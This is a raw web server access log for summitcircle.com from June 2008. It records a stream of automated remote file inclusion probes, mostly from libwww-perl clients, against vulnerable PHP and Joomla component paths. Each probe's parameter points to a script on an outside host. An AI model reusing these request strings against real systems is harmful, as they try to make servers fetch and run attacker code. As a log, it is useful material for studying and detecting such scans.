207.58.181.74 - - [08/Jun/2008:18:09:27 -0700] "GET /logs/access_071210.log/index.php?body=http://municoinco.cl/weba/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
207.58.181.74 - - [08/Jun/2008:18:09:27 -0700] "GET /index.php?body=http://municoinco.cl/weba/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
207.58.181.74 - - [08/Jun/2008:18:09:27 -0700] "GET /logs/index.php?body=http://municoinco.cl/weba/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
91.76.83.235 - - [08/Jun/2008:18:09:31 -0700] "GET /homex.asp?Q=Homepage HTTP/1.0" 404 275 "http://www.summitcircle.com/homex.asp?Q=Homepage" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)" "www.summitcircle.com"
207.58.181.74 - - [08/Jun/2008:18:09:31 -0700] "GET /logs/access_071008.log/index.php?body=http://municoinco.cl/weba/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
91.76.83.235 - - [08/Jun/2008:18:09:37 -0700] "GET / HTTP/1.0" 200 763 "http://www.summitcircle.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)" "www.summitcircle.com"
70.88.226.121 - - [08/Jun/2008:18:09:53 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
87.22.37.144 - - [08/Jun/2008:18:09:54 -0700] "GET /index.php?body=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.22.37.144 - - [08/Jun/2008:18:10:09 -0700] "GET /index.php?body=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
62.141.48.154 - - [08/Jun/2008:18:10:34 -0700] "GET /main.php?pagina=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
70.88.226.121 - - [08/Jun/2008:18:11:01 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
212.227.251.172 - - [08/Jun/2008:18:12:17 -0700] "GET /index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
80.154.38.121 - - [08/Jun/2008:18:12:34 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.227.251.172 - - [08/Jun/2008:18:12:40 -0700] "GET /index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
207.7.108.240 - - [08/Jun/2008:18:14:07 -0700] "GET /index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
207.7.108.240 - - [08/Jun/2008:18:15:49 -0700] "GET /index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.51.219.170 - - [08/Jun/2008:18:16:04 -0700] "GET /logs/access_071231.log/errors.php?error=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
209.51.219.170 - - [08/Jun/2008:18:16:04 -0700] "GET /errors.php?error=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
209.51.219.170 - - [08/Jun/2008:18:16:05 -0700] "GET /logs/errors.php?error=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
209.51.219.170 - - [08/Jun/2008:18:16:05 -0700] "GET /logs/access_071231.log/modules/My_eGallery/index.php?basepath=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
209.51.219.170 - - [08/Jun/2008:18:16:05 -0700] "GET /modules/My_eGallery/index.php?basepath=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
209.51.219.170 - - [08/Jun/2008:18:16:05 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
213.229.60.50 - - [08/Jun/2008:18:16:06 -0700] "GET /logs/access_071022.log/news.php?dir=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
213.229.60.50 - - [08/Jun/2008:18:16:07 -0700] "GET /news.php?dir=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
213.229.60.50 - - [08/Jun/2008:18:16:07 -0700] "GET /logs/news.php?dir=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
213.229.60.50 - - [08/Jun/2008:18:16:13 -0700] "GET /news.php?dir=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
70.88.226.121 - - [08/Jun/2008:18:16:28 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
70.88.226.121 - - [08/Jun/2008:18:16:29 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:17:10 -0700] "GET /logs/access_071210.log/index.php?body=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:17:10 -0700] "GET /index.php?body=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:17:10 -0700] "GET /logs/index.php?body=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:17:14 -0700] "GET /logs/access_071008.log/index.php?body=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
213.229.60.50 - - [08/Jun/2008:18:17:18 -0700] "GET /logs/access.log/news.php?dir=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:17:20 -0700] "GET /logs/access_071210.log/index.php?body=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:17:20 -0700] "GET /index.php?body=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:17:20 -0700] "GET /logs/index.php?body=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:17:24 -0700] "GET /logs/access_071008.log/index.php?body=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
77.92.85.12 - - [08/Jun/2008:18:17:45 -0700] "GET /logs/access_070917.log/components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/the0nlyhills/ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
77.92.85.12 - - [08/Jun/2008:18:17:45 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/the0nlyhills/ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
77.92.85.12 - - [08/Jun/2008:18:17:45 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/the0nlyhills/ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
77.92.85.12 - - [08/Jun/2008:18:17:46 -0700] "GET /logs/access_071022.log/components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/the0nlyhills/ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
209.51.219.170 - - [08/Jun/2008:18:17:58 -0700] "GET /logs/access_071210.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
209.51.219.170 - - [08/Jun/2008:18:17:58 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
209.51.219.170 - - [08/Jun/2008:18:17:58 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
209.51.219.170 - - [08/Jun/2008:18:17:58 -0700] "GET /logs/access_071112.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
69.61.106.42 - - [08/Jun/2008:18:18:39 -0700] "GET /news.php?dir=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
70.88.226.121 - - [08/Jun/2008:18:19:57 -0700] "GET /logs/access_071001.log//modules/vwar/admin/admin.php?vwar_root=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:18:20:55 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:18:20:55 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:18:20:55 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:18:21:15 -0700] "GET /logs/access_080121.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:18:21:49 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "summitcircle.com"
87.106.84.245 - - [08/Jun/2008:18:21:53 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.106.84.245 - - [08/Jun/2008:18:21:53 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:22:30 -0700] "GET /index.php?body=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:22:43 -0700] "GET /index.php?body=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
195.32.96.7 - - [08/Jun/2008:18:22:46 -0700] "GET /index.php?body=http://h1.ripway.com/i3/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "summitcircle.com"
195.32.96.7 - - [08/Jun/2008:18:22:46 -0700] "GET /logs/index.php?body=http://h1.ripway.com/i3/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "summitcircle.com"
87.106.84.245 - - [08/Jun/2008:18:23:06 -0700] "GET /logs/access_071224.log/index2.php?cont=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.106.84.245 - - [08/Jun/2008:18:23:07 -0700] "GET /index2.php?cont=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.106.84.245 - - [08/Jun/2008:18:23:07 -0700] "GET /logs/index2.php?cont=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
69.61.106.42 - - [08/Jun/2008:18:24:43 -0700] "GET /logs/access_071217.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
69.61.106.42 - - [08/Jun/2008:18:24:43 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
69.61.106.42 - - [08/Jun/2008:18:24:43 -0700] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
87.106.84.245 - - [08/Jun/2008:18:24:54 -0700] "GET /logs/access_071022.log/index.php?pag=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
70.86.5.10 - - [08/Jun/2008:18:26:08 -0700] "GET /logs/access_071210.log/index.php?body=http://www.geocities.com/dinarisma/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
70.86.5.10 - - [08/Jun/2008:18:26:08 -0700] "GET /logs/index.php?body=http://www.geocities.com/dinarisma/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
70.86.5.10 - - [08/Jun/2008:18:26:12 -0700] "GET /logs/access_071008.log/index.php?body=http://www.geocities.com/dinarisma/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
201.25.155.27 - - [08/Jun/2008:18:26:20 -0700] "GET /logs/access_071224.log/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
74.6.18.241 - - [08/Jun/2008:18:27:00 -0700] "GET /logs/access_070910.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
69.61.106.42 - - [08/Jun/2008:18:28:41 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "summitcircle.com"
147.32.229.11 - - [08/Jun/2008:18:28:57 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
70.88.226.121 - - [08/Jun/2008:18:29:05 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.61.106.42 - - [08/Jun/2008:18:29:06 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.229.60.50 - - [08/Jun/2008:18:30:16 -0700] "GET /logs/access_071217.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
213.229.60.50 - - [08/Jun/2008:18:30:17 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
213.229.60.50 - - [08/Jun/2008:18:30:17 -0700] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
69.61.106.42 - - [08/Jun/2008:18:30:25 -0700] "GET /logs/access_080127.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:18:30:59 -0700] "GET /logs/access_071001.log//components/com_simpleboard/file_upload.php?sbp=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:18:30:59 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:18:30:59 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:18:30:59 -0700] "GET /logs/access_071015.log//components/com_simpleboard/file_upload.php?sbp=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
195.54.9.218 - - [08/Jun/2008:18:31:52 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
70.88.226.121 - - [08/Jun/2008:18:32:04 -0700] "GET /index.php?body=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
70.88.226.121 - - [08/Jun/2008:18:32:21 -0700] "GET /index.php?body=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
213.229.60.50 - - [08/Jun/2008:18:33:04 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "summitcircle.com"
213.229.60.50 - - [08/Jun/2008:18:33:33 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
203.130.242.48 - - [08/Jun/2008:18:34:38 -0700] "GET /logs/access_071029.log/index1.php?site=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
203.130.242.48 - - [08/Jun/2008:18:34:39 -0700] "GET /index1.php?site=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
203.130.242.48 - - [08/Jun/2008:18:34:39 -0700] "GET /logs/index1.php?site=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
203.130.242.48 - - [08/Jun/2008:18:34:40 -0700] "GET /logs/access_080120.log/index1.php?site=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
203.130.242.48 - - [08/Jun/2008:18:35:43 -0700] "GET /index1.php?site=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
203.130.242.48 - - [08/Jun/2008:18:35:46 -0700] "GET /index1.php?site=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.51.219.170 - - [08/Jun/2008:18:36:24 -0700] "GET /logs/access.log/errors.php?error=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
209.51.219.170 - - [08/Jun/2008:18:36:24 -0700] "GET /errors.php?error=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
209.51.219.170 - - [08/Jun/2008:18:36:24 -0700] "GET /logs/errors.php?error=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
203.130.242.48 - - [08/Jun/2008:18:36:25 -0700] "GET /logs/index1.php?site=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
203.130.242.48 - - [08/Jun/2008:18:36:26 -0700] "GET /index1.php?site=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.51.219.170 - - [08/Jun/2008:18:36:26 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
209.51.219.170 - - [08/Jun/2008:18:36:26 -0700] "GET /modules/My_eGallery/index.php?basepath=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
209.51.219.170 - - [08/Jun/2008:18:36:26 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
66.36.241.244 - - [08/Jun/2008:18:36:37 -0700] "GET /logs/index.php?path=http://www.geocities.com/kitfacil167/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
66.36.241.244 - - [08/Jun/2008:18:36:37 -0700] "GET /index.php?path=http://www.geocities.com/kitfacil167/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
147.32.229.11 - - [08/Jun/2008:18:36:45 -0700] "GET /logs/access_071231.log/modules/My_eGallery/public/displayCategory.php?basepath=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
147.32.229.11 - - [08/Jun/2008:18:36:45 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
147.32.229.11 - - [08/Jun/2008:18:36:46 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
70.88.226.121 - - [08/Jun/2008:18:36:51 -0700] "GET /logs/access_070917.log/components/com_simpleboard/image_upload.php?sbp=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
70.88.226.121 - - [08/Jun/2008:18:36:52 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
70.88.226.121 - - [08/Jun/2008:18:36:52 -0700] "GET /logs/access_071022.log/components/com_simpleboard/image_upload.php?sbp=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.53.196.178 - - [08/Jun/2008:18:38:26 -0700] "GET /index1.php?go=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.summitcircle.com"
74.53.196.178 - - [08/Jun/2008:18:38:26 -0700] "GET /logs/index1.php?go=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.summitcircle.com"
213.229.60.50 - - [08/Jun/2008:18:38:42 -0700] "GET /logs/access_080127.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:18:38:47 -0700] "GET /logs/access.log/index2.php?pagina=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:18:38:47 -0700] "GET /index2.php?pagina=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:18:38:47 -0700] "GET /logs/index2.php?pagina=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:18:39:04 -0700] "GET /logs/access_080225.log/index2.php?pagina=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
160.99.12.231 - - [08/Jun/2008:18:39:30 -0700] "GET /logs/access_071210.log/index.php?body=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
160.99.12.231 - - [08/Jun/2008:18:39:30 -0700] "GET /index.php?body=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
160.99.12.231 - - [08/Jun/2008:18:39:31 -0700] "GET /logs/index.php?body=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
62.140.73.234 - - [08/Jun/2008:18:39:34 -0700] "GET /index1.php?go=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.summitcircle.com"
